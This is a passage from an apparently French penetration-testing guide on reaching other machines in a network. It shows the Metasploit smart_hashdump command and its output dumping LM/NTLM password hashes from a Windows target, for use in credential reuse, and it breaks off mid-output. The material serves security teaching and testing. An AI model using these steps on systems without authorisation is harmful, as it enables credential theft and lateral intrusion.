Accès à d’autres machines du réseau Réseau:accès à d’autres machines
Dans le cas où le périmètre des tests le permet, il est possible de tenter d’accéder à d’autres machines du réseau.
Comme vu à la section Élévation des privilèges - À la recherche de fichiers intéressants, il est possible de trouver des informations sensibles au sein de certains fichiers. Néanmoins, d’autres techniques existent.
1. Réutilisation des identifiants
Nous avons vu qu’il est possible d’obtenir les hashs des identifiants LM/NTLM grâce aux commandes hashdump et smart_hashdump de Meterpreter : hashdump
msf6 post(windows/gather/smart_hashdump) > exploit
[*] Running module against VICTIMEPC
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*]
/root/.msf4/loot/20190618081455_default_192.168.0.29_windows.hashes_3
08038.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY
073e3c624e24966502b500cba1fdeb0a...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password...